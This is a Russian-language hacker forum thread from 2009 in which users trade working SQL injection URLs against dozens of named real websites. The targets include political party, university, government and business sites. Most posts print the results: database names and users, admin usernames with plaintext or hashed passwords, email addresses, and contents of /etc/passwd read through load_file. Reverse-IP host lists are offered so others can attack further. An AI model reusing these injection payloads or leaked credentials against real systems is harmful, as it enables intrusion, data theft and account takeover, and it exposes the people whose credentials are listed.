db: 5.0.32-Debian_7etch8-log
mame_db: nsk
user: nsk@localhost
<<Яблоко: Омск>>
http://omsk.yabloko.ru/persons/index.phtml?id=-47+union+select+1,2,3,4,5,6,7,8,table_name,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31+from+information_schema.tables+limit+31,1--
db: 5.0.32-Debian_7etch8-log
mame_db: omsk
user: omsk@localhost
PS. Опять промах......
<<Яблоко: Чита>>
http://www.chita.yabloko.ru/persons/index.phtml?id=-2+union+select+1,2,3,4,5,6,7,8,database(),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31--
db: 5.0.32-Debian_7etch8-log
mame_db: chita
user: chita@localhost
Кто хочет добить держите....
Сайты на сервере(ReverseIP):
eng.kaliningrad.yabloko.ru [212.48.142.179]
forums.yabloko.ru [212.48.142.179]
forums.yabloko.ru [212.48.142.179]
irk.yabloko.ru [212.48.142.179]
irk.yabloko.ru [212.48.142.179]
nail.yabloko.ru [212.48.142.179]
nnov.yabloko.ru [212.48.142.179]
omsk.yabloko.ru [212.48.142.179]
photos.yabloko.ru [212.48.142.179]
pskov.yabloko.ru [212.48.142.179]
pskov.yabloko.ru [212.48.142.179]
www.bezviz.yabloko.ru [212.48.142.179]
www.bunimovich.ru [212.48.142.179]
www.bunimovich.ru [212.48.142.179]
www.business.yabloko.ru [212.48.142.179]
www.chel.yabloko.ru [212.48.142.179]
www.chel.yabloko.ru [212.48.142.179]
www.chita.yabloko.ru [212.48.142.179]
www.chita.yabloko.ru [212.48.142.179]
www.eng.yabloko.ru [212.48.142.179]
www.eng.yabloko.ru
www.kaliningrad.yabloko.ru
www.kaliningrad.yabloko.ru
www.khv.yabloko.ru
www.khv.yabloko.ru
www.kras.yabloko.ru
www.krasnoyarsk.yabloko.ru
www.krasnoyarsk.yabloko.ru
www.mitrohin.ru
www.mitrohin.ru
www.mmya.yabloko.ru
www.mordovia.yabloko.ru
www.mordovia.yabloko.ru
www.moscow.yabloko.ru
www.moscow.yabloko.ru
www.mosobl.yabloko.ru
www.mosobl.yabloko.ru
www.netlly.com
www.netlly.com
www.nsk.yabloko.ru
www.nsk.yabloko.ru
www.orenburg.yabloko.ru
www.orenburg.yabloko.ru
www.penza.yabloko.ru
www.penza.yabloko.ru
www.politedu.yabloko.ru
www.primorye.yabloko.ru
www.primorye.yabloko.ru
www.projects.yabloko.ru
www.projects.yabloko.ru
www.rostov.yabloko.ru
www.rostov.yabloko.ru
www.samara.yabloko.ru
www.samara.yabloko.ru
www.shishlov.ru
www.shishlov.ru
www.simbirsk.yabloko.ru
www.spb.yabloko.ru
www.spb.yabloko.ru
www.stavropol.yabloko.ru
www.stavropol.yabloko.ru
www.student.yabloko.ru
www.sverdlovsk.yabloko.ru
www.sverdlovsk.yabloko.ru
www.taimyr.yabloko.ru
www.tambov.yabloko.ru
www.tambov.yabloko.ru
www.tomsk.yabloko.ru
www.tver.yabloko.ru
www.tyumen.yabloko.ru
www.tyumen.yabloko.ru
www.tyumen.yabloko.ru
www.ugra.yabloko.ru
www.ugra.yabloko.ru
www.volgograd.yabloko.ru
www.volgograd.yabloko.ru
www.yabloko.ru
www.yabloko.ru
www.yaroslavl.yabloko.ru
www.yaroslavl.yabloko.ru
www.yavlinsky.ru
www.yavlinsky.ru
www.youth.yabloko.ru
www.youth.yabloko.ru
zhensovet.yabloko.ru
zhensovet.yabloko.ru
DrAssault
29.03.2009, 13:12
http://www.lueffyworld.net/sport.php?id=-121+union+select+1,2,3,4,concat_ws(0x3a,user_id,us ername,user_password),6,7,8+from+phpbb_users/*
http://www.roofing.ru/news/text?newsid=-10+union+select+1,2,3,4,5,6,7
user(),database(),version():
roofing_admin@localhost::roofing_bcms::4.0.27-standard
Blind sql-inj
http://www.itp.zp.ua/index.php?showpage=32+and+substring(version(),1,1) =5
spherics
29.03.2009, 17:03
PageRank = 7
http://www.gaeilge.ie/using/terms/cat_search.asp?id=17%20or%201=@@version--
Version: Microsoft SQL Server 2000 - 8.00.679 (Intel X86) Aug 26 2002 15:09:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
http://www.gaeilge.ie/using/terms/cat_search.asp?id=17%20or%201=(select%20system_use r)--
User: dbase_user
http://www.gaeilge.ie/using/terms/cat_search.asp?id=17%20or%201=(select%20db_name())--
Database: fnag
<<myOpera>>
http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=44645+and+ascii(substring(version(),1,1))=5 3--+
db: 5.0.27
name_db: myopera_myoperarum
user: myopera_myopera@localhost
НЕ ТОБОЙ НАЙДЕНО... Мог бы "-" поставил бы...
http://forum.xakep.ru/fb.aspx?m=1483201
Это не очем не говарит!!!!!! и не доказывает что не я нашол.....
Там я тока под другм ником :) более того, этого юзвера я угнал неделю назад......:)
<<myOpera>>
http://forum.myopera.net/showflat.php?Cat=&Board=newsuser&Number=44645+and+ascii(substring(version(),1,1))=5 3--+
db: 5.0.27
name_db: myopera_myoperarum
user: myopera_myopera@localhost
НЕ ТОБОЙ НАЙДЕНО... Мог бы "-" поставил бы...
http://forum.xakep.ru/fb.aspx?m=1483201
Возможно,нашёль и ты сам,но было выложено рание...
http://hip-hop.sib.net/music/download.php?id=100+and+substring(@@version,1,1)=4
http://www.cy-pr.com/img_hip-hop.sib.net_6.gif
DrAssault
29.03.2009, 18:36
http://sandpiperleads.com/warrenrupp_register/thanks.php?RegisterID=-9999+UNION+SELECT+user(),2,version()/*
<<Управления большими системами>>
http://ubs.mtas.ru/search/search_results.php?short_view=0&publication_id=-2621+union+select+1,concat_ws(0x3a,version(),datab ase(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20--+
db: 5.0.44-log
name_db: mtas116_libr
user: mtas116_libr@localhost
И снова blind sql-inj
http://associate.hud.ac.uk/php/showpage.php?pageid=54+and+substring(version(),1,1 )=5
<<Центр востоноаления зрения>>
http://www.cvz.ru/index.php?id=-10+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),database(),user()),8--+
db: 4.1.22-log
name_db: wwwcvzru_cmsmy
user: cvz_cmsmy@localhost
<<ТЕАТР.DOC>>
http://www.teatrdoc.ru/plays.php?id=-5+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--+
db: 4.1.22
name_db: kinoteatr_td
user: kinoteatr_mysql@194.85.92.114
<<Экозащита>>
http://ecodefense.ru/view.php?id=-431+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a, version(),database(),user()),11--+
db: 4.1.22
name_db: ecodefense
user: ecodefensedb@localhost
«Информационные технологии и телерадиокоммуникации» - электронный журнал - http://ittc.ksu.ru
http://ittc.ksu.ru/?id=-29+union+select+1,concat(version(),0x3a,database() ,0x3a,user()),3,4,5,6,7,8,9,10,11--
user(): ittcdb@localhost
database(): ittcdb
version(): 5.0.67
PR=4
читаем таблицы
http://ittc.ksu.ru/?id=-29+union+select+1,table_name,3,4,5,6,7,8,9,10,11+f rom+INFORMATION_schema.tables+limit+0,1--
Holistic Health Yellow Pages and Supersite
http://www.findhealer.com/ref/docdetail.php3?id=-29+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8, 9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3, 4,5,6,7,8,9,0,1,2,3,4,5,6,7,8--
user(): chinamed@localhost
database(): chinamed
version(): 4.1.21-standard
PR=4
http://www.bulgariahousehunting.com/details.php?id=116+AND+SUBSTRING((y=1..3()),1,1)=x--
y1=version
y2=database
y3=user
x=Version : 4.1.22-log
Database : bulgar_house
User : krasig@localhost
-m0rgan-
29.03.2009, 22:11
www.baspublishing.com.au
http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,concat_ws(0x3a,user,passwor d,file_priv),3,4,5+from+mysql.user--
Логин/пасс:
root:164378093c1aa083
file_priv - Y
Читает etc/passwd:
http://www.baspublishing.com.au/detail.php?id=-1+union+all+select+0,1,load_file(0x2f6574632f70617 3737764),3,4,5+from+mysql.user--
# $FreeBSD: src/etc/master.passwd,v 1.25.2.1 2001/11/24 17:22:24 gshapiro Exp $ # root:*:0:0:Charlie &:/root:/bin/bash toor:*:0:0:Bourne-again Superuser:/root: daemon:*:1:1:Owner of many system proces
На сервере крутится FreeBSD.
------------------------------------------------------------------
The End!
http://travel.chinavista.com
http://travel.chinavista.com/culture2.php?id=1+union+select+1,table_name+from+i nformation_schema.tables/*
http://www.transtriumf.com/line.php?id=-8+UNION+SELECT+1,2,3,4,5,6,7,8/*
Database Version: 4.0.16-Max-log
Database name: transtriumf
User name: transtriumf@localhost
<<NovoNews>>
http://www.novonews.lv/index.php?mode=news&id=-70666'+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws (0x3a,version(),database(),user()),12,13,14,15--+
db: 5.0.22-log
name_db: novonews_v2
user: novonews_v2_adm@192.168.1.1
log: dima
pass: amid643
email: dimzulu@gmail.com
http://www.novonews.lv/admin/index.php?login
<<Стоматит>>
http://www.dentoprofile.ru/php/content.php?id=577+and+ascii(substring(version(),1 ,1))=52--+
database: 4.0.16
<<SFCB>>
http://www.sfcb.org/php/category.php?id=1+union+select+1,concat_ws(0x3a,ve rsion(),database(),user()),3,4,5,6,7,8,9,10,11,12/*
db: 4.1.22
name_db: sfcb
user: sfcbor@localhost
<<AveDesk>>
http://www.avedesk.org/desklet.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10--
db: 5.0.67
name_db: dfilezon_avedesk
user: dfilezon_ave@localhost
log: addd
pass: fff
ПаВлУшКа
30.03.2009, 14:45
http://www.ausit.org/eng/showpage.php3?id=-650+union+select+concat_ws(0x20,version(),database (),user()),2,3
Database Version: 4.1.25-log
Database name: ausit2
User name: dream@localhost
M.W.N.N.
30.03.2009, 15:08
http://www.conferencedes19cpas.irisnet.be/cpas2.php?id=4+union+select+1,unhex(hex(concat(ver sion(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30+limit+1,1/*
version():4.1.11-Debian_4sarge8-log
database():db_cpasbru
user():cpasbru@organa.irisnet.be
__
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat (version(),0x3a,database(),0x3a,user()),4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28+from+mysql.user+limit+1,1/*
version():5.0.27
database():IIHE
user():root@localhost
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat (user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql .user+limit+1,1/*
root:710789ba2a55b808
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,load_f ile(%27/etc/passwd%27),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28+from+mysql.user+limi t+1,1/*
<<MAXIM>>
http://www.maxim-stroy.ru/catalog/index.php?id=-80+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),database(),user()),9,10,11,12,13--+
db: 5.0.67-log
name_db: u72532
user: u72532@10.10.223.239
log: admin
pass: max77
-m0rgan-
30.03.2009, 16:21
www.auroragroup.com.au
Колонки из Information_schema:
articles,galleries,photos,phplist_admin,phplist_ad min_attribute,phplist_admin_task,phplist_adminattr ibute,phplist_attachment,phplist_bounce,phplist_bo unceregex,phplist_bounceregex_bounce,phplist_confi g,phplist_eventlog,phplist_linktrack,phplist_linkt rack_userclick,phplist_list,phplist_listmessage,ph plist_listrss,phplist_listuser,phplist_message,php list_message_attachment,phplist_messagedata,phplis t_rssitem,phplist_rssitem_data,phplist_rssitem_use r,phplist_sendprocess,phplist_subscribepage,phplis t_subscribepage_data,phplist_task,phplist_template ,phplist_templateimage,phplist_urlcache,phplist_us er_attribute,phplist_user_blacklist,phplist_user_b lacklist_data,phplist_user_message_bounce,phplist_ user_message_forward,phplist_user_rss,phplist_user _user,phplist_user_user_attribute,php Return to gallery
Меня заимнересовала колонка phplist_admin
Её структура:
id,loginname,namelc,email,created,modified,modifie dby,password,passwordchanged,superuser,disabled
Вывод:
http://www.auroragroup.com.au/viewphoto.php?id=-1+union+all+select+0,1,2,concat_ws(0x3a,id,loginna me,namelc,email,created,modified,modifiedby,passwo rd,passwordchanged,superuser,disabled)+from+phplis t_admin--
------------------------------------------------------------------------------------------------------
The End!
<<Доска объявлений>>
http://www.infoboard.reporter-studio.ru/idv.php?id=-7947'+union+select+1,2,3,4,5,6,concat_ws(0x3a,vers ion(),database(),user()),8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28--+
db: 5.0.51a-community-nt-log
name_db: 1gb_reporter4
user: 1gb_reporter4@81.176.226.44
http://www.infoboard.reporter-studio.ru/admin/
log: admin
pass: 374982
<<Империя Курсовых>>
http://www.kursovic.ru/showdoc.php?id=-100022+union+select+version()--+
db: 4.0.27
name_db: kursovic
user: kursovic@54valuehost.ru
<<Продукция.НТЦ"Кардея">>
http://www.kardeya.ru/index.php?main=catalog&id=-3570+union+select+1,unhex(hex(version())),3,4,5--+
db: 4.1.16-nt
name_db: kardeya
user: kardeya@localhost
Blind SQL-inj
http://associate.hud.ac.uk/php/showpage.php?pageid=54+and+ascii(lower(substring( апрос,1,1)))=значение
version: 5.0.37
database: assoc_web
user: assocweb@localhost
M.W.N.N.
30.03.2009, 19:10
http://www.frso.be/blog.php?bid=10%27+union+select+1,2,3,4,concat(ver sion(),0x3a,database(),0x3a,user()),6,7,8,9,10,11, 12+limit+1,1/*
version():5.0.45
database():frso
user():frso@localhost
___
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(versio n(),0x3a,database(),0x3a,user()),6,7,8,9,10,11+lim it+1,1/*
version():4.1.22-standard-log
database():joodscultuurfestival
user():detrezl@213.193.229.176
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(id,0x3 a,user,0x3a,pass),6,7,8,9,10,11+from+admin+limit+1 ,1
/*
http://www.joodscultuurfestival.be/admin/
id:login:password
1:lev:b59c67bf196a4758191e42f76670ceba = 1111
<<Строительство в Москве>>
http://www.mos-stroi.ru/cats.php?id=-94600+union+select+1,2,3,4,5,concat_ws(0x3a,versio n(),database(),user()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28--+
db: 5.0.67-community
name_db: ruprom_ruprom
user: ruprom@localhost
M.W.N.N.
30.03.2009, 19:20
http://www.donorinfo.be/fiche.php?ProjectID=126+union+select+1,2,3,4,5,6,7 ,8,concat(version(),0x3a,database(),0x3a,user()),1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50,51,52,53,54+limit+1,1/*
version():4.1.22-standard-log
database():donorinfo
user():donorinfo@192.168.0.26
_
http://www.gastenkamersantwerpen.be/pub/member.php?id=6+union+select+concat(version(),0x3a ,database(),0x3a,user()),2,3,4,5,6,7,8,9,10+limit+ 1,1
version():5.0.67-community-log
database():kbpkrgxq_BBAntwerp
user():kbpkrgxq_wolf@localhost
http://www.gastenkamersantwerpen.be/pub/member.php?id=6+union+select+concat(email,0x3a,use rname,0x3a,password),2,3,4,5,6,7,8,9,10+from+users +limit+1,1
http://www.gastenkamersantwerpen.be/cms/index.php
login:pass:email
admin:asimov:wolf@pandora.be
<<Денис Колисниченко. Документация по Linux и PHP. Linux-сервер своими руками>>
http://www.dkws.org.ua/index.php?page=fcat&id=-12+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6--
db: 5.1.30
name_db: dkwsorgu_team
user: dkwsorgu_team@localhost
http://www.dkws.org.ua/admin/ - :) :) :) у кого плохо настроения, заходите.....
table: phpbb_users
log: Bear
pass: 270576
+limit+1x1-- - и все юзверы как на ладоне.
<<Клуб деловой информации "Санкт Питербург">>
http://www.stpeteclub.ru/news/new.php?id=-287+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4--+
db: 4.0.27-log
name_db: new
user: new@localhost
http://www.stpeteclub.ru/admin/
log: adm2in
pass: re4hb5wf
ПаВлУшКа
31.03.2009, 00:41
http://sascha.loeffler.gs/downloadwahl.php?id=-12+union+select+1,concat_ws(0x20,user(),database() ,version()),3,4,5--
version():5.0.32-Debian_7etch8-log
database():sascha
user():sascha@localhost
http://promcomplekt.com/products/view.php?pid=1075+union+select+1+limit+1,1/*
Database Version: 5.0.24-standard
Database name: db_promcomplekt1
User name: promcomplekt1@localhost
BlackSun
31.03.2009, 11:54
http://www.crackdb.com/get.php?id=-1%27+union+select+1,2,Password,4,5,6,7,8,9,10,11,1 2,13,14,15,16+from+mysql.user+--+
http://www.rdholding.ru/get.php?id=-1+union+select+1,2,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2 f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2 e2e2f2e2e2f2e2e2f6574632f706173737764,4,5,6,7,8+--+
http://www.nfodb.com/get.php?id=-1%27+union+select+1,2,3,4,5,LOAD_FILE(%27/etc/passwd%27),7,8,9,10,11,12,13,14,15,16,17,18,19+fro m+files+--+
http://www.hackzone.us/forum/?a=open&fid=1&id=-1+union+select+11,1,10,9,table_name,7,6,5,4,3,2+fr om+information_schema.tables+limit+35,1+--+
http://www.tusculumpioneers.com/sport.php?id=-10+union+select+1,2,aes_decrypt(aes_encrypt(versio n(),0x61),0x61),4,5,6,7,8,9,10,11,12+--+
<<ГК Международный институт менеджмента>>
http://www.gkmim.ru/index.php?area=table&shose=-1'+union+select+1,concat_ws(0x20,version(),databas e(),user())--+
db: 5.0.76
name_db: gkmim
user: gkmim@localhost
http://www.gkmim.ru/admin/
table: phpbb_users
log: gkmim-admin
pas: 991c1e56f1c6e0c03c72bf95611194de :(
users:
log: Марина
pas: 123
+limit+x,x--+
http://s1701.zouo.ru/site.php?id=-34+union+select+unhex(hex(version())),2,3--+
db: 4.1.16-nt
name_db: s1701
user: s1701@localhost
http://s1701.zouo.ru/manager/
table: phpbb_users
log: nachalka
pas: 1701nachalka
Target: www.cbc.bb
Evil link: http://www.cbc.bb/index.pl/article?id=-1+union+select+1,2,version(),user(),5,6,7,database (),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37
version: 4.0.27-standard-log
user: csite28@AdServNode1
database: csite28_CPSG
Читаем локальные файлы:
http://www.cbc.bb/index.pl/article?id=-1+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37
ПаВлУшКа
31.03.2009, 20:07
http://www.audepp.org/boxSeccion.php?id=106+and+substring(version(),1,1) =4
http://www.photos-gallery.net/subcategory.php?id=-1012+union+select+version()--
http://www.sai.org.uy/website/iframes/novedad_ampliada.php?id=-44+union+select+1,2,3,4,5,6,version(),8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23--
spherics
31.03.2009, 21:12
http://www.ccaabelem.com.br/?pg=conteudoq&id=7987986491+union+select+1,concat_ws(0x3a,versio n(),user(),database()),3,4,5,6,7,8,9,10,11--
Database Version: 5.0.22
Database name: ccaabelem
User name: ccaabelem@189-38-86-3.net2.com.br
Администраторы
http://www.ccaabelem.com.br/?pg=conteudoq&id=7987986491+UNION+SELECT+1,CONCAT(0x3a,(SELECT+C ONCAT(id_admin,0x3a,nome,0x3a,logina,0x3a,senhaa,0 x3a,privilegios)+FROM+ccaabelem.administrador+LIMI T+0,1),0x3a),3,4,5,6,7,8,9,10,11--
id_admin : nome : logina : senhaa : privilegios
:1 : Eugenio Augusto : guto :fgjasd : 1
:2 : Max:max : 34513451 : 2
:5 : douglas : douglas : 32451242:4
:4 : FABRIZIO : fabrizio :prado:1
:8 : polyanna : polyanna :2341234:4
http://www.ceci-br.org/novo/revista/printarticle.php?id=37+union+select+version(),user (),database(),4,5--&layout=html
Version: 4.0.27-locaweb-log
User: ceci_br1@200.234.200.80
Database: ceci_br1
http://www.bmwstyle.ru/bmw.php?id=-138+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8--+
db:5.0.67-0ubuntu6
name_db: www_bmwstyle_ru
user: bmwstyle@localhost
log: Admin
pass: admin123
-m0rgan-
31.03.2009, 23:31
innovations-forum-rodgau.de
http://www.innovations-forum-rodgau.de/memberinfo.php?id=-1+union+all+select+0,convert(version()+using+latin 1),convert(database()+using+latin1),3,convert(user ()+using+latin1),5,6,7,8,9,10,11,12,13,14--
юзер/версия/бд:
ifr@localhost:4.1.11-Debian_4sarge7-log:ifr_db
---------------------------------------------------------------------------------
The End!
M.W.N.N.
01.04.2009, 00:07
http://loonen.fmns.rug.nl/arcticstation/weblog.php?nr=111+union+select+1,concat(version(), 0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10,11
version():5.0.51a-3ubuntu5.4-log
database():loonenmsql1
user():loonenmsql1@localhost
http://loonen.fmns.rug.nl/arcticstation/weblog.php?nr=111+union+select+1,2,3,4,5,6,7,8,9,1 0,11+from+user
__
http://www.dromedaris.nl/link.php?id=1267+union+select+1,2,3,concat(version (),0x3a,database(),0x3a,user()),5,6+limit+1,1/*
version():4.1.20-log
database():dromedaris
user():dromed@localhost
__
http://scriptorium.serve-it.nl/view.php?sid=40+union+select+1,2,3,4,5,6,unhex(hex (concat(version(),0x3a,database(),0x3a,user()))),8 ,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():4.1.12-standard
database():serve_scriptorium
user():serve_serve@localhost
http://scriptorium.serve-it.nl/view.php?sid=40+union+select+1,2,3,4,5,6,unhex(hex (concat(email,0x3a,password))),8,9,10,11,12,13,14, 15,16,17,18,19+from+scriptorium_users+limit+1,1/*
rembo@serve-it.nl:1ed8b85b1aee78c5
http://scriptorium.serve-it.nl/login.php
___
http://www.dho.nl/index.php?mid=2+union+select+1,2,3,4,concat(versio n(),0x3a,database(),0x3a,user()),6,7,8,9,10,11,12, 13,14,15,16+limit+1,1
version():5.0.51a-24-log
database():dho_nl
user():dho@hostingnode3.lan
__
http://www.brusselsmuseums.be/en/brusscard/participants.php?mid=25+union+select+1,2,concat(ve rsion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19+limit+1,1/*
version():5.0.32-Debian_7etch8
database():bmuseum
user():pointbe@localhost
__
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(versio n(),0x3a,database(),0x3a,user()),6,7,8,9,10,11+lim it+1,1
version():4.1.22-standard-log
database():joodscultuurfestival
user():detrezl@213.193.229.176
http://www.joodscultuurfestival.be/event.php?id=40+union+select+1,2,3,4,concat(id,0x3 a,user,0x3a,pass),6,7,8,9,10,11+from+admin+limit+1 ,1/*
1:lev:b59c67bf196a4758191e42f76670ceba
http://www.joodscultuurfestival.be/admin/
___
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat (version(),0x3a,database(),0x3a,user()),4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28+limit+1,1/*
version():5.0.27
database():IIHE
user():root@localhost
http://w3.iihe.ac.be/About_Us/ident_people_iihe.php?ID=8+union+select+1,2,concat (user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28+from+mysql .user+limit+1,1/*
root:710789ba2a55b808
http://www.shipfinance.bm/index.php?id=462+AND+SUBSTRING((y() ),1,1)=x-- &pressrelease=1273904.html
y1=version
y2=database
y3=user
x=Version : 5.1.31-community
Database : OFR_shipfinance1208
User : shipfinance1208@localhost
-m0rgan-
01.04.2009, 00:15
http://www.bildstein-bueros.de/www/startnext/pop.php?id=-1+union+all+select+0,1,concat_ws(0x3a,version(),us er(),database()),3,4,5,6,7,8,9,10,11,12--
юзер/версия/бд:
4.0.15-log:dom2671@localhost:dom2671
PR6
http://www.bridgesventures.com/news.php?newsID=54+AND+SUBSTRING((y() ),1,1)=x--/*
y1=version
y2=database
y3=user
x=Version : 3.23.49
Database : db2780
User : mysql2780@websrv5.netbenefit.co.uk
pr4@5.0.37-standard-log
http://www.phoneslimited.co.uk/description.php?id=10802+union+select+version()/*
PR5
http://www.asociatiait.ro/comunicate.php?NewsId=-36+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),useR()),6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20/*
Database Version: 4.1.22-log
Database name: apdetic
User name: apdetic@localhost
-m0rgan-
01.04.2009, 02:08
www.azw.at
http://www.azw.at/item.php?item_id=-1+union+all+select+0,1,2,3,4,5,6,7,8,9,concat_ws(0 x3a,user(),version(),database()),11,12,13,14,15,16 ,17,18--+
юзер/версия/бд:
nr00649_adm@localhost:5.0.32-Debian_7etch8-log:nr00649_db
PR5
http://www.nationmultimedia.com/breakingnews/read.php?newsid=-30082501+union+select+1,convert(concat_ws(0x3a,ver sion(),database(),user())+using+binary),3,4,5,6,7, 8,9,10,11,12,13,14
Database Version: 4.1.7-log
Database name: nationnews
User name: nation01@192.168.52.56
mailbrush
01.04.2009, 12:55
С первым апреля!!! Наконец я дома!
www.glenridgeposse.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
glenridge@localhost:q3stats:5.0.51a-3ubuntu5.4-log
www.glenridgeposse.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
gamez.proc.ru/q3-cpma/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:statq3cpma:5.0.45
gamez.proc.ru/q3-cpma/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
stats.ef-clan.org/fragland/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
fragland@cyberwebserver-21.de:fragland:5.0.32-Debian_7etch8-log
play.fuzzy76.net/statistics/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.67-0ubuntu6
objstats.tce-massa.com/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
obj0307@localhost:obj0307:5.0.60-log
western.bsdmon.com/vsp/pub/themes/westernq3/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:westernvsp_dm:5.0.51
gry.isko.net.pl/statystyki/et27980/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vspet27980@localhost:vsp27980:5.0.54-log
PR4
http://scmsgroup.org/php/show_newsdetails.php?newsid=-49+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9
Version : 4.1.22-community
Database : db2522
Use : c2172@ns104.fastdnsservers.com
http://scmsgroup.org/php/show_newsdetails.php?newsid=-49+union+select+1,2,concat_ws(0x3a,username,userpa ssword),4,5,6,7,8,9+from+admin
erihtoney
01.04.2009, 15:03
http://www.ls.huji.ac.il/grulabs/member.php?id=-1+union+select+concat_ws(0x3a3a20203a3a,version(), database(),user()),2,3,4,5,6,7
version: 4.1.22-community-max-nt-log
database: inglor_fb
user: inglor@ktalav.cc.huji.ac.il
___________________
Department of tourism and Resorts of Georgia
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x203a20,versio n(),user(),database()),7,8
version: 5.0.67-community
database: dotrgovg_tourism
user: dotrgovg@localhost
all tables:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,table_name,7,8+from+infor mation_schema.tables
user:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,column_name,7,8+from+info rmation_schema.columns+where+table_name='user'
admin:
http://www.dotr.gov.ge/eng/news.php?id=-1+union+select+1,2,3,4,5,name,7,8+from+user--
name: admin
password: ********* :)
admin panel:
http://www.dotr.gov.ge/
PR5
два сайта на одной бд
http://www.yourcommunicationnews.com/news_item.php?newsID=11176+AND+SUBSTRING((y()),1,1 )=x
http://www.yourindustrynews.com/index.php?region=1+AND+SUBSTRING((y() ),1,1)=x
y1=version
y2=database
y3=user
x=Version : 5.0.51
Database : db_YourIndustryNews
User : eastcoast@localhost
-m0rgan-
01.04.2009, 18:45
http://www.vipaspa.it/de/news_scheda.php?idn=-1+union+all+select+0,convert(user()+using+latin1), convert(version()+using+latin1),convert(database() +using+latin1),4--+
юзер/версия/бд:
dbvipa@66.71.190.34:4.1.16-standard-log:530220vipa
PR5
http://www.sundaystandard.info/news/news_item.php?NewsID=3302&GroupID=3+and+substring(y(),1,1)=x
y1=version
y2=database
y3=user
x=Version: 5.0.67-community-log
Database : sundaysf_ss
User : sundaysf_ss@localhost
Target: www.nasr.com.au
